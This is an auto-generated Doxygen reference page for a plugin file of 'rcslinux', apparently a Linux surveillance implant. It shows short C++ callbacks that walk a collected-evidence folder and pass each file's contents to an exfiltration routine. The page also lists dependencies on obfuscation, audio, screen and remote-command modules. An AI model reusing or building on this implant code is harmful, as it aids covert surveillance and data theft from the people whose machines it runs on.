<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.18"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<title>rcslinux: plugins/modevidence/CModEvidence.cpp File Reference</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/searchdata.js"></script>
<script type="text/javascript" src="search/search.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
 <tbody>
 <tr style="height: 56px;">
  <td id="projectalign" style="padding-left: 0.5em;">
   <div id="projectname">rcslinux
   </div>
  </td>
 </tr>
 </tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.18 -->
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&amp;dn=gpl-2.0.txt GPL-v2 */
var searchBox = new SearchBox("searchBox", "search",false,'Search');
/* @license-end */
</script>
<script type="text/javascript" src="menudata.js"></script>
<script type="text/javascript" src="menu.js"></script>
<script type="text/javascript">
/* @license magnet:?xt=urn:btih:cf05388f2679ee054f2beb29a391d25f4e673ac3&amp;dn=gpl-2.0.txt GPL-v2 */
$(function() {
  initMenu('',true,false,'search.php','Search');
  $(document).ready(function() { init_search(); });
});
/* @license-end */</script>
<div id="main-nav"></div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
     onmouseover="return searchBox.OnSearchSelectShow()"
     onmouseout="return searchBox.OnSearchSelectHide()"
     onkeydown="return searchBox.OnSearchSelectKey(event)">
</div>

<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0" 
        name="MSearchResults" id="MSearchResults">
</iframe>
</div>

<div id="nav-path" class="navpath">
  <ul>
<li class="navelem"><a class="el" href="dir_38c8d24aef3972a7f87b834274e76e31.html">plugins</a></li><li class="navelem"><a class="el" href="dir_ebb1a4ffd9b1c72471af4c9a323738a3.html">modevidence</a></li>  </ul>
</div>
</div><!-- top -->
<div class="header">
  <div class="summary">
<a href="#define-members">Macros</a> &#124;
<a href="#func-members">Functions</a>  </div>
  <div class="headertitle">
<div class="title">CModEvidence.cpp File Reference</div>  </div>
</div><!--header-->
<div class="contents">
<div class="textblock"><code>#include &quot;<a class="el" href="CModEvidence_8h_source.html">CModEvidence.h</a>&quot;</code><br />
<code>#include &lt;<a class="el" href="bdutils_8h_source.html">bdutils.h</a>&gt;</code><br />
<code>#include &lt;<a class="el" href="ICore_8h_source.html">ICore.h</a>&gt;</code><br />
<code>#include &lt;inttypes.h&gt;</code><br />
</div><div class="textblock"><div class="dynheader">
Include dependency graph for CModEvidence.cpp:</div>
<div class="dyncontent">
<div class="center"><img src="CModEvidence_8cpp__incl.png" border="0" usemap="#plugins_2modevidence_2CModEvidence_8cpp" alt=""/></div>
<map name="plugins_2modevidence_2CModEvidence_8cpp" id="plugins_2modevidence_2CModEvidence_8cpp">
<area shape="rect" title=" " alt="" coords="2838,5,2982,47"/>
<area shape="rect" href="CModEvidence_8h.html" title=" " alt="" coords="2790,95,2913,121"/>
<area shape="rect" href="bdutils_8h.html" title=" " alt="" coords="1366,95,1436,121"/>
<area shape="rect" href="ICore_8h.html" title=" " alt="" coords="2938,95,3003,121"/>
<area shape="rect" title=" " alt="" coords="3027,95,3106,121"/>
<area shape="rect" href="CPluginBase_8h.html" title=" " alt="" coords="2744,177,2853,203"/>
<area shape="rect" href="IEvidence_8h.html" title=" " alt="" coords="2978,177,3069,203"/>
<area shape="rect" href="IPlugin_8h.html" title=" " alt="" coords="2728,259,2802,285"/>
<area shape="rect" href="CDynLoad_8h.html" title=" " alt="" coords="2243,259,2338,285"/>
<area shape="rect" href="CEvent_8h.html" title=" " alt="" coords="2826,259,2904,285"/>
<area shape="rect" href="CJson_8h.html" title=" " alt="" coords="2634,259,2704,285"/>
<area shape="rect" title=" " alt="" coords="1600,333,1666,360"/>
<area shape="rect" href="CMutex_8h.html" title=" " alt="" coords="2826,333,2904,360"/>
<area shape="rect" title=" " alt="" coords="2616,333,2722,360"/>
<area shape="rect" title=" " alt="" coords="36,177,99,203"/>
<area shape="rect" title=" " alt="" coords="685,333,746,360"/>
<area shape="rect" title=" " alt="" coords="241,259,305,285"/>
<area shape="rect" href="obfuscate_8h.html" title="taken from https://gist.github.com/mattypiper/158b88765170cd72b7bbb0f6e1c5cddd &#160;provides runtime stri..." alt="" coords="1857,259,1948,285"/>
<area shape="rect" href="CFileMap_8h.html" title=" " alt="" coords="695,177,784,203"/>
<area shape="rect" href="CFile_8h.html" title=" " alt="" coords="564,259,628,285"/>
<area shape="rect" href="CLog_8h.html" title=" " alt="" coords="382,177,446,203"/>
<area shape="rect" href="CTime_8h.html" title=" " alt="" coords="124,177,196,203"/>
<area shape="rect" href="CAES_8h.html" title=" " alt="" coords="908,259,979,285"/>
<area shape="rect" href="CMemory_8h.html" title=" " alt="" coords="270,177,358,203"/>
<area shape="rect" href="CString_8h.html" title=" " alt="" coords="1700,177,1777,203"/>
<area shape="rect" href="CProcess_8h.html" title=" " alt="" coords="961,177,1052,203"/>
<area shape="rect" href="CUser_8h.html" title=" " alt="" coords="710,259,780,285"/>
<area shape="rect" href="CThread_8h.html" title=" " alt="" coords="1126,177,1209,203"/>
<area shape="rect" href="CRNG_8h.html" title=" " alt="" coords="2146,259,2219,285"/>
<area shape="rect" href="CSHA1_8h.html" title=" " alt="" coords="1284,177,1363,203"/>
<area shape="rect" href="CSHA256_8h.html" title=" " alt="" coords="1472,259,1564,285"/>
<area shape="rect" href="CExecutableFormat_8h.html" title=" " alt="" coords="521,177,670,203"/>
<area shape="rect" href="CDevice_8h.html" title=" " alt="" coords="1439,177,1523,203"/>
<area shape="rect" href="CHttp_8h.html" title=" " alt="" coords="1212,259,1280,285"/>
<area shape="rect" href="CNetwork_8h.html" title=" " alt="" coords="1304,259,1396,285"/>
<area shape="rect" href="CWindow_8h.html" title=" " alt="" coords="1589,259,1677,285"/>
<area shape="rect" href="CAudio_8h.html" title=" " alt="" coords="1802,177,1878,203"/>
<area shape="rect" href="CImg_8h.html" title=" " alt="" coords="1702,259,1767,285"/>
<area shape="rect" href="CBase64_8h.html" title=" " alt="" coords="1046,259,1132,285"/>
<area shape="rect" href="CZlib_8h.html" title=" " alt="" coords="820,259,884,285"/>
<area shape="rect" href="CRSA_8h.html" title=" " alt="" coords="2395,177,2466,203"/>
<area shape="rect" title=" " alt="" coords="1954,177,2032,203"/>
<area shape="rect" title=" " alt="" coords="2056,177,2207,203"/>
<area shape="rect" title=" " alt="" coords="2231,169,2371,211"/>
<area shape="rect" title=" " alt="" coords="242,333,301,360"/>
<area shape="rect" title=" " alt="" coords="129,259,190,285"/>
<area shape="rect" href="IConfiguration_8h.html" title=" " alt="" coords="2362,259,2477,285"/>
<area shape="rect" href="IBinaryPatch_8h.html" title=" " alt="" coords="2502,259,2610,285"/>
<area shape="rect" href="IPluginManager_8h.html" title=" " alt="" coords="3093,177,3216,203"/>
<area shape="rect" href="IRemoteCommand_8h.html" title=" " alt="" coords="3240,177,3383,203"/>
</map>
</div>
</div>
<p><a href="CModEvidence_8cpp_source.html">Go to the source code of this file.</a></p>
<table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="define-members"></a>
Macros</h2></td></tr>
<tr class="memitem:a0acf7475326cdcd31d690b72033de33a"><td class="memItemLeft" align="right" valign="top">#define&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="CModEvidence_8cpp.html#a0acf7475326cdcd31d690b72033de33a">PLUGIN_NAME</a>&#160;&#160;&#160;&quot;modevidence&quot;</td></tr>
<tr class="separator:a0acf7475326cdcd31d690b72033de33a"><td class="memSeparator" colspan="2">&#160;</td></tr>
</table><table class="memberdecls">
<tr class="heading"><td colspan="2"><h2 class="groupheader"><a name="func-members"></a>
Functions</h2></td></tr>
<tr class="memitem:a059b25eae0c9691ffc03478bef362549"><td class="memItemLeft" align="right" valign="top"><a class="el" href="classAgentPlugin_1_1IPlugin.html">IPlugin</a> *&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="CModEvidence_8cpp.html#a059b25eae0c9691ffc03478bef362549">instance</a> ()</td></tr>
<tr class="separator:a059b25eae0c9691ffc03478bef362549"><td class="memSeparator" colspan="2">&#160;</td></tr>
<tr class="memitem:a49b56d9416bb6da84f1ee61a93f5a53b"><td class="memItemLeft" align="right" valign="top">static int&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="CModEvidence_8cpp.html#a49b56d9416bb6da84f1ee61a93f5a53b">evidenceWalkCallback</a> (const char *path, void *context, int depth, struct dirent *entry)</td></tr>
<tr class="separator:a49b56d9416bb6da84f1ee61a93f5a53b"><td class="memSeparator" colspan="2">&#160;</td></tr>
<tr class="memitem:a071a1d7a19dc50db4408fa36938b3d9a"><td class="memItemLeft" align="right" valign="top">static int&#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="CModEvidence_8cpp.html#a071a1d7a19dc50db4408fa36938b3d9a">sizeWalkCallback</a> (const char *path, void *context, int depth, struct dirent *entry)</td></tr>
<tr class="separator:a071a1d7a19dc50db4408fa36938b3d9a"><td class="memSeparator" colspan="2">&#160;</td></tr>
</table>
<h2 class="groupheader">Macro Definition Documentation</h2>
<a id="a0acf7475326cdcd31d690b72033de33a"></a>
<h2 class="memtitle"><span class="permalink"><a href="#a0acf7475326cdcd31d690b72033de33a">&#9670;&nbsp;</a></span>PLUGIN_NAME</h2>

<div class="memitem">
<div class="memproto">
      <table class="memname">
        <tr>
          <td class="memname">#define PLUGIN_NAME&#160;&#160;&#160;&quot;modevidence&quot;</td>
        </tr>
      </table>
</div><div class="memdoc">

<p class="definition">Definition at line <a class="el" href="CModEvidence_8cpp_source.html#l00017">17</a> of file <a class="el" href="CModEvidence_8cpp_source.html">CModEvidence.cpp</a>.</p>

</div>
</div>
<h2 class="groupheader">Function Documentation</h2>
<a id="a49b56d9416bb6da84f1ee61a93f5a53b"></a>
<h2 class="memtitle"><span class="permalink"><a href="#a49b56d9416bb6da84f1ee61a93f5a53b">&#9670;&nbsp;</a></span>evidenceWalkCallback()</h2>

<div class="memitem">
<div class="memproto">
<table class="mlabels">
  <tr>
  <td class="mlabels-left">
      <table class="memname">
        <tr>
          <td class="memname">static int evidenceWalkCallback </td>
          <td>(</td>
          <td class="paramtype">const char *&#160;</td>
          <td class="paramname"><em>path</em>, </td>
        </tr>
        <tr>
          <td class="paramkey"></td>
          <td></td>
          <td class="paramtype">void *&#160;</td>
          <td class="paramname"><em>context</em>, </td>
        </tr>
        <tr>
          <td class="paramkey"></td>
          <td></td>
          <td class="paramtype">int&#160;</td>
          <td class="paramname"><em>depth</em>, </td>
        </tr>
        <tr>
          <td class="paramkey"></td>
          <td></td>
          <td class="paramtype">struct dirent *&#160;</td>
          <td class="paramname"><em>entry</em>&#160;</td>
        </tr>
        <tr>
          <td></td>
          <td>)</td>
          <td></td><td></td>
        </tr>
      </table>
  </td>
  <td class="mlabels-right">
<span class="mlabels"><span class="mlabel">static</span></span>  </td>
  </tr>
</table>
</div><div class="memdoc">
<p><a class="el" href="namespaceBdUtils.html#a37367a26f0112e4088d11d4662335e79">BdUtils::DIRWALKCB</a> implementation to provide the evidence manager with each evidence found </p><dl class="params"><dt>Parameters</dt><dd>
  <table class="params">
    <tr><td class="paramname">path</td><td>path to the evidence to be exfiltrated </td></tr>
    <tr><td class="paramname">context</td><td>pointer to the ICore interface </td></tr>
    <tr><td class="paramname">depth</td><td></td></tr>
    <tr><td class="paramname">entry</td><td></td></tr>
  </table>
  </dd>
</dl>
<dl class="section see"><dt>See also</dt><dd>CFile::walkDir </dd></dl>
<dl class="section return"><dt>Returns</dt><dd></dd></dl>

<p class="definition">Definition at line <a class="el" href="CModEvidence_8cpp_source.html#l00082">82</a> of file <a class="el" href="CModEvidence_8cpp_source.html">CModEvidence.cpp</a>.</p>
<div class="fragment"><div class="line"><a name="l00082"></a><span class="lineno">   82</span>&#160;                                                                                                  {</div>
<div class="line"><a name="l00083"></a><span class="lineno">   83</span>&#160;    <a class="code" href="classAgentCore_1_1ICore.html">ICore</a>* core = (<a class="code" href="classAgentCore_1_1ICore.html">ICore</a>*)context;</div>
<div class="line"><a name="l00084"></a><span class="lineno">   84</span>&#160;    uint8_t* data = <span class="keyword">nullptr</span>;</div>
<div class="line"><a name="l00085"></a><span class="lineno">   85</span>&#160;    <span class="keywordtype">size_t</span> size = 0;</div>
<div class="line"><a name="l00086"></a><span class="lineno">   86</span>&#160;    <span class="keywordtype">int</span> res = CFile::toBuffer(path,&amp;data,&amp;size);</div>
<div class="line"><a name="l00087"></a><span class="lineno">   87</span>&#160;    <span class="keywordflow">if</span> (res == 0) {</div>
<div class="line"><a name="l00088"></a><span class="lineno">   88</span>&#160;        <span class="comment">// call the evidence manager, which in turn will call the exfiltrator for this evidence</span></div>
<div class="line"><a name="l00089"></a><span class="lineno">   89</span>&#160;        <span class="comment">// this is called in the recurrent exfiltrator thread, which will free the path and data once done</span></div>
<div class="line"><a name="l00090"></a><span class="lineno">   90</span>&#160;        <span class="keywordtype">char</span>* p = CString::dup(path);</div>
<div class="line"><a name="l00091"></a><span class="lineno">   91</span>&#160;        core-&gt;<a class="code" href="classAgentCore_1_1ICore.html#a8b9a299e9de7602159f6966e66444e9b">evdMgr</a>()-&gt;<a class="code" href="group__EVIDENCE__INTERNAL.html#ga3c492d604cde635c9079a36db4045da3">exfiltrateEvidence</a>(p, data, size, <span class="keyword">false</span>);</div>
<div class="line"><a name="l00092"></a><span class="lineno">   92</span>&#160;    }</div>
<div class="line"><a name="l00093"></a><span class="lineno">   93</span>&#160;    <span class="keywordflow">return</span> res;</div>
<div class="line"><a name="l00094"></a><span class="lineno">   94</span>&#160;}</div>
</div><!-- fragment -->
<p class="reference">References <a class="el" href="CString_8cpp_source.html#l00014">BdUtils::CString::dup()</a>, <a class="el" href="classAgentCore_1_1ICore.html#a8b9a299e9de7602159f6966e66444e9b">AgentCore::ICore::evdMgr()</a>, <a class="el" href="group__EVIDENCE__INTERNAL.html#ga3c492d604cde635c9079a36db4045da3">AgentCore::IEvidence::exfiltrateEvidence()</a>, and <a class="el" href="CFile_8cpp_source.html#l00037">BdUtils::CFile::toBuffer()</a>.</p>

<p class="reference">Referenced by <a class="el" href="CModEvidence_8cpp_source.html#l00100">AgentPluginPrivate::CModEvidence::evidenceWalkInternal()</a>.</p>

</div>
</div>
<a id="a059b25eae0c9691ffc03478bef362549"></a>
<h2 class="memtitle"><span class="permalink"><a href="#a059b25eae0c9691ffc03478bef362549">&#9670;&nbsp;</a></span>instance()</h2>

<div class="memitem">
<div class="memproto">
      <table class="memname">
        <tr>
          <td class="memname"><a class="el" href="classAgentPlugin_1_1IPlugin.html">IPlugin</a>* instance </td>
          <td>(</td>
          <td class="paramname"></td><td>)</td>
          <td></td>
        </tr>
      </table>
</div><div class="memdoc">
<p>get the plugin instance </p>

<p class="definition">Definition at line <a class="el" href="CModEvidence_8cpp_source.html#l00021">21</a> of file <a class="el" href="CModEvidence_8cpp_source.html">CModEvidence.cpp</a>.</p>
<div class="fragment"><div class="line"><a name="l00021"></a><span class="lineno">   21</span>&#160;                               {</div>
<div class="line"><a name="l00022"></a><span class="lineno">   22</span>&#160;    <span class="keywordflow">if</span> (<a class="code" href="CPluginBase_8cpp.html#ac294a95d63deba8831a754100349423d">_instance</a> == <span class="keyword">nullptr</span>) {</div>
<div class="line"><a name="l00023"></a><span class="lineno">   23</span>&#160;        <a class="code" href="CPluginBase_8cpp.html#ac294a95d63deba8831a754100349423d">_instance</a> = <span class="keyword">new</span> <a class="code" href="classAgentPluginPrivate_1_1CModEvidence.html">CModEvidence</a>();</div>
<div class="line"><a name="l00024"></a><span class="lineno">   24</span>&#160;    }</div>
<div class="line"><a name="l00025"></a><span class="lineno">   25</span>&#160;    <span class="keywordflow">return</span> <a class="code" href="CPluginBase_8cpp.html#ac294a95d63deba8831a754100349423d">_instance</a>;</div>
<div class="line"><a name="l00026"></a><span class="lineno">   26</span>&#160;}</div>
</div><!-- fragment -->
<p class="reference">References <a class="el" href="CPluginBase_8cpp_source.html#l00016">_instance</a>.</p>

<p class="reference">Referenced by <a class="el" href="CConfigManager_8cpp_source.html#l00023">AgentCorePrivate::CConfigManager::CConfigManager()</a>, <a class="el" href="CPluginManager_8cpp_source.html#l00042">AgentCorePrivate::CPluginManager::CPluginManager()</a>, <a class="el" href="CPluginManager_8cpp_source.html#l00123">AgentCorePrivate::CPluginManager::loadPlugin()</a>, <a class="el" href="CConfigManager_8cpp_source.html#l00087">AgentCorePrivate::CConfigManager::read()</a>, <a class="el" href="CCoreUtils_8cpp_source.html#l00144">AgentCorePrivate::CCoreUtils::readEncrypted()</a>, <a class="el" href="CPluginManager_8cpp_source.html#l00326">AgentCorePrivate::CPluginManager::uninstallFull()</a>, <a class="el" href="CPluginManager_8cpp_source.html#l00285">AgentCorePrivate::CPluginManager::uninstallPluginInternal()</a>, <a class="el" href="CCoreUtils_8cpp_source.html#l00011">AgentCorePrivate::CCoreUtils::writeEncryptedWithDeviceKey()</a>, and <a class="el" href="CPluginManager_8cpp_source.html#l00024">AgentCorePrivate::CPluginManager::~CPluginManager()</a>.</p>

</div>
</div>
<a id="a071a1d7a19dc50db4408fa36938b3d9a"></a>
<h2 class="memtitle"><span class="permalink"><a href="#a071a1d7a19dc50db4408fa36938b3d9a">&#9670;&nbsp;</a></span>sizeWalkCallback()</h2>

<div class="memitem">
<div class="memproto">
<table class="mlabels">
  <tr>
  <td class="mlabels-left">
      <table class="memname">
        <tr>
          <td class="memname">static int sizeWalkCallback </td>
          <td>(</td>
          <td class="paramtype">const char *&#160;</td>
          <td class="paramname"><em>path</em>, </td>
        </tr>
        <tr>
          <td class="paramkey"></td>
          <td></td>
          <td class="paramtype">void *&#160;</td>
          <td class="paramname"><em>context</em>, </td>
        </tr>
        <tr>
          <td class="paramkey"></td>
          <td></td>
          <td class="paramtype">int&#160;</td>
          <td class="paramname"><em>depth</em>, </td>
        </tr>
        <tr>
          <td class="paramkey"></td>
          <td></td>
          <td class="paramtype">struct dirent *&#160;</td>
          <td class="paramname"><em>entry</em>&#160;</td>
        </tr>
        <tr>
          <td></td>
          <td>)</td>
          <td></td><td></td>
        </tr>
      </table>
  </td>
  <td class="mlabels-right">
<span class="mlabels"><span class="mlabel">static</span></span>  </td>
  </tr>
</table>
</div><div class="memdoc">
<p><a class="el" href="namespaceBdUtils.html#a37367a26f0112e4088d11d4662335e79">BdUtils::DIRWALKCB</a> implementation to calculate the size of the evidence folder </p><dl class="params"><dt>Parameters</dt><dd>
  <table class="params">
    <tr><td class="paramname">path</td><td></td></tr>
    <tr><td class="paramname">context</td><td>size_t* </td></tr>
    <tr><td class="paramname">depth</td><td></td></tr>
    <tr><td class="paramname">entry</td><td></td></tr>
  </table>
  </dd>
</dl>
<dl class="section see"><dt>See also</dt><dd>CFile::walkDir </dd></dl>
<dl class="section return"><dt>Returns</dt><dd></dd></dl>

<p class="definition">Definition at line <a class="el" href="CModEvidence_8cpp_source.html#l00229">229</a> of file <a class="el" href="CModEvidence_8cpp_source.html">CModEvidence.cpp</a>.</p>
<div class="fragment"><div class="line"><a name="l00229"></a><span class="lineno">  229</span>&#160;                                                                                              {</div>
<div class="line"><a name="l00230"></a><span class="lineno">  230</span>&#160;    <span class="keywordtype">size_t</span>* s = (<span class="keywordtype">size_t</span>*)context;</div>
<div class="line"><a name="l00231"></a><span class="lineno">  231</span>&#160;    uint64_t sz;</div>
<div class="line"><a name="l00232"></a><span class="lineno">  232</span>&#160;    <span class="keywordflow">if</span> (CFile::size(path,&amp;sz) == 0) {</div>
<div class="line"><a name="l00233"></a><span class="lineno">  233</span>&#160;        <span class="comment">// add to size</span></div>
<div class="line"><a name="l00234"></a><span class="lineno">  234</span>&#160;        *s += sz;</div>
<div class="line"><a name="l00235"></a><span class="lineno">  235</span>&#160;    }</div>
<div class="line"><a name="l00236"></a><span class="lineno">  236</span>&#160;    <span class="keywordflow">return</span> 0;</div>
<div class="line"><a name="l00237"></a><span class="lineno">  237</span>&#160;}</div>
</div><!-- fragment -->
<p class="reference">References <a class="el" href="CFile_8cpp_source.html#l00137">BdUtils::CFile::size()</a>.</p>

<p class="reference">Referenced by <a class="el" href="CModEvidence_8cpp_source.html#l00239">AgentPluginPrivate::CModEvidence::evidenceStorageSize()</a>.</p>

</div>
</div>
</div><!-- contents -->
<div class="ttc" id="aCPluginBase_8cpp_html_ac294a95d63deba8831a754100349423d"><div class="ttname"><a href="CPluginBase_8cpp.html#ac294a95d63deba8831a754100349423d">_instance</a></div><div class="ttdeci">IPlugin * _instance</div><div class="ttdef"><b>Definition:</b> <a href="CPluginBase_8cpp_source.html#l00016">CPluginBase.cpp:16</a></div></div>
<div class="ttc" id="aclassAgentCore_1_1ICore_html_a8b9a299e9de7602159f6966e66444e9b"><div class="ttname"><a href="classAgentCore_1_1ICore.html#a8b9a299e9de7602159f6966e66444e9b">AgentCore::ICore::evdMgr</a></div><div class="ttdeci">virtual IEvidence * evdMgr()=0</div></div>
<div class="ttc" id="aclassAgentPluginPrivate_1_1CModEvidence_html"><div class="ttname"><a href="classAgentPluginPrivate_1_1CModEvidence.html">AgentPluginPrivate::CModEvidence</a></div><div class="ttdoc">implements default on-disk evidence storage</div><div class="ttdef"><b>Definition:</b> <a href="CModEvidence_8h_source.html#l00067">CModEvidence.h:67</a></div></div>
<div class="ttc" id="aclassAgentCore_1_1ICore_html"><div class="ttname"><a href="classAgentCore_1_1ICore.html">AgentCore::ICore</a></div><div class="ttdoc">exposes the application (agent) context AgentCorePrivate::CAppContext to the plugins</div><div class="ttdef"><b>Definition:</b> <a href="ICore_8h_source.html#l00032">ICore.h:32</a></div></div>
<div class="ttc" id="agroup__EVIDENCE__INTERNAL_html_ga3c492d604cde635c9079a36db4045da3"><div class="ttname"><a href="group__EVIDENCE__INTERNAL.html#ga3c492d604cde635c9079a36db4045da3">AgentCore::IEvidence::exfiltrateEvidence</a></div><div class="ttdeci">virtual void exfiltrateEvidence(char *path, uint8_t *data, int size, bool spawn=false)=0</div></div>
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated by &#160;<a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.18
</small></address>
</body>
</html>
